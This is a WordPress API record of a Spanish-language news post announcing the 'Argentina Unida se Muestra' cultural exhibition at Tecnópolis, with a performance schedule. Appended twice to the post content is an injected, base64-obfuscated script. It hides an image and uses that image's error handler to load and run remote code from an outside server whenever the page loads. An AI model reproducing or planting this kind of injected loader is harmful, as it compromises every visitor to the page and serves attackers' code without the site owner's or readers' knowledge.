{"id":2882,"date":"2023-07-20T11:29:54","date_gmt":"2023-07-20T14:29:54","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2882"},"modified":"2025-08-14T00:12:15","modified_gmt":"2025-08-14T03:12:15","slug":"continua-argentina-unida-se-muestra-40-anos-de-democracia-en-tecnopolis","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2882","title":{"rendered":"Continua Argentina Unida se Muestra, 40 a\u00f1os de Democracia en Tecn\u00f3polis"},"content":{"rendered":"\n<p class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>Argentina Unida se Muestra sigue present\u00e1ndose en Tecn\u00f3polis hasta el d\u00eda 27 de agosto. Esta tercera edici\u00f3n tiene como consigna los 40 a\u00f1os de Democracia y es realizada por el Ministerio de Cultura de la Naci\u00f3n, a trav\u00e9s de la Secretar\u00eda de Desarrollo Cultural, la Direcci\u00f3n de Coordinaci\u00f3n del Consejo Federal Cultura y el Consejo Federal de Cultura representado por las \u00e1reas de cultura de los gobiernos provinciales y los entes de cultura regionales<\/em><\/p>\n\n\n\n<p>\u201cEl objetivo de <em>Argentina Unida se Muestra<\/em> es visibilizar y difundir la cultura nacional con su diversidad e identidad que la caracteriza. Una muestra federal en la que la cultura celebra los 40 a\u00f1os de la Democracia.\u201d Dijo <strong>Lucrecia Cardoso<\/strong>, Secretaria de Desarrollo Cultural de la Naci\u00f3n.<\/p>\n\n\n\n<p>Por <strong>5 fines de semana<\/strong> m\u00e1s, se podr\u00e1 disfrutar de <strong>Argentina Unida se Muestra <\/strong>con sus tres espacios:<\/p>\n\n\n\n<p>La <strong>Muestra permanente <\/strong>es la construcci\u00f3n colectiva de la identidad nacional y la democracia en la que cada provincia expone mediante im\u00e1genes, audiovisuales y textos los hitos culturales de los <strong>40 a\u00f1os de Democracia <\/strong>en cada lugar de la Argentina.&nbsp;<\/p>\n\n\n\n<p><strong>Patio Federal<\/strong>, expresiones de m\u00fasica y danza de todas las regiones y provincias del pa\u00eds en vivo.<\/p>\n\n\n\n<p><strong>Galer\u00eda Regional <\/strong>donde se puede encontrar artesan\u00edas y gastronom\u00eda de todo el pa\u00eds para disfrutar.<\/p>\n\n\n\n<p>Todos los espacios est\u00e1n vinculados con los sectores del <strong>Mercado de Industrias Culturales Argentinas (MICA)<\/strong> y todas las regiones culturales tienen fechas espec\u00edficas para presentar sus actividades art\u00edsticas.<\/p>\n\n\n\n<p>La programaci\u00f3n art\u00edstica del <strong>viernes 21<\/strong> est\u00e1 a cargo de las provincias de <strong>Buenos Aires y Santa Cruz<\/strong>:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1010\" height=\"97\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Captura-de-pantalla-2023-07-20-112713.jpg\" alt=\"\" class=\"wp-image-2883\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Captura-de-pantalla-2023-07-20-112713.jpg 1010w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Captura-de-pantalla-2023-07-20-112713-300x29.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Captura-de-pantalla-2023-07-20-112713-768x74.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/Captura-de-pantalla-2023-07-20-112713-696x67.jpg 696w\" sizes=\"(max-width: 1010px) 100vw, 1010px\" \/><\/figure>\n\n\n\n<p>13:30 hs. &#8211; Ballet CFC \u2018La Rebeli\u00f3n\u2019<\/p>\n\n\n\n<p>14:00 hs. &#8211; Agustina Ocampo Jazz Tr\u00edo (Santa Cruz)<\/p>\n\n\n\n<p>15:00 hs. &#8211; Juane Braccalenti (Santa Cruz)<\/p>\n\n\n\n<p>16:00 hs. &#8211; Francheros<\/p>\n\n\n\n<p>17:00 hs. &#8211; Soema Montenegro (PBA)<\/p>\n\n\n\n<p>17:30 hs. &#8211; Willy Bronca (PBA)<\/p>\n\n\n\n<p>La programaci\u00f3n art\u00edstica del <strong>s\u00e1bado 22<\/strong> est\u00e1 a cargo de la provincia de Salta y la Ciudad Aut\u00f3noma de Buenos Aires:<\/p>\n\n\n\n<p>13:30 hs. &#8211; Ballet CFC \u2018La Rebeli\u00f3n\u2019<\/p>\n\n\n\n<p>14:00 hs. &#8211; Suena Eh (CABA)<\/p>\n\n\n\n<p>15:00 hs. &#8211; Marcela Ceballos (Salta)<\/p>\n\n\n\n<p>16:00 hs. &#8211; Los Pampas (CABA)<\/p>\n\n\n\n<p>16:40 hs. &#8211; TRIPLE F. Liga Femenina de Freestyle<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Argentina Unida se Muestra sigue present\u00e1ndose en Tecn\u00f3polis hasta el d\u00eda 27 de agosto. Esta tercera edici\u00f3n tiene como consigna los 40 a\u00f1os de Democracia y es realizada por el Ministerio de Cultura de la Naci\u00f3n, a trav\u00e9s de la Secretar\u00eda de Desarrollo Cultural, la Direcci\u00f3n de Coordinaci\u00f3n del Consejo Federal Cultura y el Consejo [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2884,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26],"tags":[],"class_list":{"0":"post-2882","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2882"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2882"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2882\/revisions"}],"predecessor-version":[{"id":7018,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2882\/revisions\/7018"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2884"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2882"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2882"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2882"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}